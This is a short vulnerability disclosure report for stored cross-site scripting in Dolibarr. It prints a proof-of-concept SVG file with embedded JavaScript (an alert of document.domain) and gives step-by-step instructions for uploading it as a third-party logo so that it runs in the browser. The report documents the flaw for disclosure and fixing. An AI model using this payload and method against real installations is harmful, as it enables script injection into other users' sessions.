Cross-site Scripting (XSS) - Stored in Dolibarr/dolibarr

Valid
Reported on May 21st 2021

✍️ Description

dolibarr is vulnerable to XSS. It is possible to upload SVG files containing JavaScript code.

🕵️‍♂️ Proof of Concept

SVG file content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
  1. With an authenticated user, access http://localhost/societe/card.php?action=create&leftmenu=.
  2. Write any content in the Third-party name field.
  3. Select any Prospect / Customer.
  4. Create an SVG file with the content above poc.svg.
  5. In the Logo field, upload the SVG file created.
  6. Click on create third party.
  7. Access the logo link.

PoC video: https://www.youtube.com/watch?v=rPP1Vs-GBco.

💥 Impact

Arbitrary Javascript code execution.